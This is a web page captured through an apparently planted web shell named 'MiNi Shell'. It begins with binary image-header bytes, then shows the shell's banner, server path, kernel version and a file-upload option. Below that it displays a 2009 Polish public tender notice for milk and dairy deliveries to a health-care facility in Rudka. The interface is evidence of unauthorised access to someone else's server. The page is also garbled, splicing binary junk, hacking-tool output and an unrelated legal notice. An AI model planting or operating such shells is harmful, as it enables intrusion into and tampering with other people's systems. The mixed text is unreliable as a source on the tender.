JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090106/4313-N-2009.html

<p class="kh_header"><b>Mrozy: ZP/D/ML/2008r  dostawy mleka i artykułów mleczarskich</b><br>
<b>Numer ogłoszenia: 4313 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Specjalistyczny Zespół Opieki ZakładówOpieki Zdrowotnej , Al. Teodora Dunina 1, 05-320 Mrozy, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/D/ML/2008r  dostawy mleka i artykułów mleczarskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia są dostawy mleka i artykułów mleczarskich dla        
    Samodzielnego Specjalistycznego Zespołu Zakładów Opieki Zdrowotnej w Rudce 
    transportem na  koszt i ryzyko Wykonawcy przez okres 12 miesięcy od daty     
    podpisania umowy.
    Szczegółowy opis przedmiotu zamówienia określa formularz asortymentowo-
    cenowy ( załącznik nr. 2),   będący integralną częścią SIWZ
 2.Dostawy będą realizowane trzy razy w tygodniu w godzinach 530 - 700 zgodnie z             
    zamówieniem złożonym przez Zamawiającego telefonicznie lub faksem na dzień 
    przed dostawą.
    Termin przydatności do spożycia dostarczonego towaru w zależności od          
    asortymentu winien wynosić 5 -10 dni od daty jego dostarczenia do magazynu                  
    Zamawiającego.
 3.Jakość dostarczanego mleka i artykułów mleczarskich winna odpowiadać normom 
     krajowym i posiadać stosowne dokumenty dopuszczające je do sprzedaży. 
    Zamawiający zastrzega sobie  możliwość nie przyjęcia do magazynu                 
    dostarczonego towaru w przypadku stwierdzenia jego złej jakości.
 4.Zamawiający zastrzega sobie możliwość reklamowania dostarczanych artykułów           
    w trybie natychmiastowym. Wykonawca winien wymienić reklamowany 
    towar w terminie 24 godzin od chwili zgłoszenia reklamacji.
    Nie zastosowanie się do powyższego pociągnie za sobą konsekwencje finansowe
    w postaci potrącenia należności za reklamowany towar przy następnej dostawie.                                                    
 5.Nie dopuszcza się składania ofert częściowych ani  ofert wariantowych.
 6.Zamawiający nie przewiduje udzielenia zamówień uzupełniających. 
 7.Zamawiający nie zamierza zawierać umowy ramowej.
 8.Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.                           
 9..Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem 
      aukcji elektronicznej.                                                                                                                                 10. Stosownie do potrzeb, ilość zamawianych pozycji ( załącznik nr.2) może ulec 
    zmianie , co nie może spowodować zwiększenia ceny umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art.22 ust.1 ustawy z dnia 29 stycznia 2004r.- Prawo zamówień          
     publicznych  ( Dz.U. z 2007r. Nr.223 poz.1655 z późn. zm) o udzielenie             
    zamówienia mogą  ubiegać się Wykonawcy, którzy :                                                                                                    
-  posiadają uprawnienia do wykonania określonej działalności, jeżeli ustawy      
-  nakładają obowiązek posiadania takich uprawnień.
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie       
   z art.24 ustawy prawo zamówień publicznych.
- znajdują się w sytuacji finansowej i ekonomicznej umożliwiającej wykonanie       
   zamówienia w kwocie określonej w formularzu oferty Wykonawcy, załącznik nr.1
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem      
     technicznym i osobami zdolnymi do wykonania zamówienia. 
2. Ocena spełnienia powyższych warunków nastąpi na podstawie przedstawionych 
    przez Wykonawcę oświadczeń i dokumentów, o których mowa w pkt. VI SIWZ 
    według formuły ,,spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w postępowaniu, każdy                 
   z  Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty:

1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do 
   ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed 
   upływem terminu składania ofert (załącznik nr 3).
2. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz                
    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
    Ubezpieczenia Społecznego potwierdzające odpowiednio że Wykonawca nie          
    zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne     
    i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie,          
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
    wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3          
    miesiące przed upływem  terminu składania ofert. (załącznik nr 4).
3.Oświadczenie Wykonawcy Nr.1, że dostarczane przez niego mleko i artykuły                 
    mleczarskie wyszczególnione w formularzu asortymentowo-cenowym spełniają        
    określone wymogi zgodne z normami dotyczącymi tych produktów oraz, że są one                  
    dopuszczone do sprzedaży (załącznik nr 5).
4. Oświadczenie Wykonawcy Nr.2 - o spełnieniu warunków  zgodnych z art. 22 ust.1
    ustawy z dnia 29 stycznia 2004r.-Prawo zamówień publicznych (załącznik nr 6).
5. Wykaz wykonanych lub wykonywanych dostaw w okresie ostatnich trzech lat 
    przed dniem wszczęcia postępowania o udzieleniu zamówienia, a jeżeli okres 
    prowadzenia działalności  jest krótszy - w tym okresie, odpowiadających swoim 
    rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem 
    ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączyć dokumenty 
    potwierdzające, że te dostawy zostały wykonane należycie( załącznik nr 7)
6. Dokument dopuszczający pojazd do transportu mleka i artykułów mleczarskich 
    wydany przez placówkę Sanepidu, której  podlega Wykonawca (załącznik nr.8)
7. Oferty przedstawione przez dwa lub więcej podmiotów wspólnie, będą musiały 
    spełnić następujące wymagania : 
a)	oferta będzie zawierać dokumenty wymienione w punkcie VI ppkt. 1-5            dotyczące każdego partnera konsorcjum;
b)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich                   partnerów;
c)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;
d)	jeden z partnerów konsorcjum zostanie ustanowiony jako pełnomocnik             upoważniony do reprezentowania wszystkich uczestników konsorcjum                w postępowaniu albo reprezentowania wszystkich uczestników konsorcjum         w  postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.
e)	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub wszystkich partnerów łącznie lub od każdego z osobna, albo też  w inny sposób ustalony w umowie                  konsorcjum.
8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.VI         
    ppkt.1,2,   składa dokumenty o których mowa w § 2 ust.1 Rozporządzenia Prezesa  
    Rady Ministrów z dnia 19 maja 2006r.(Dz.U.Nr 87 poz.605).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.rudka.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Specjalistyczny Zespół Zakładów Opieki Zdrowotnej w Rudce
    Al. Teodora Dunina 1
    05-320 Mrozy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 13:00, miejsce: Samodzielny Specjalistyczny Zespół Zakładów Opieki Zdrowotnej w Rudce
    Al. Teodora Dunina 1
    05-320 Mrozy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com